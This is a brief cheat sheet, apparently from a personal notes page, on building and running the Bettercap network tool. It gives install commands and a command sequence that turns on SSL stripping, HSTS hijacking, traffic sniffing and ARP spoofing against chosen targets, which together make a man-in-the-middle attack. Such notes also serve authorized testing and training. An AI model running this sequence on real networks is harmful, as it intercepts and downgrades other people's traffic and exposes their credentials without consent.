Bettercap
Install
sudo apt update
sudo apt install golang git build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
git clone https://github.com/bettercap/bettercap
cd bettercap
make builUsage
sudo bettercap -iface eth0 // Without GUI
sudo bettercap -caplet http-ui // With GUIset http.proxy.sslstrip true
hstshijack/hstshijack //For the HSTS connections
net.probe on
net.sniff on
set arp.spoof.targets OUR_TARGETS
arp.spoof onLast updated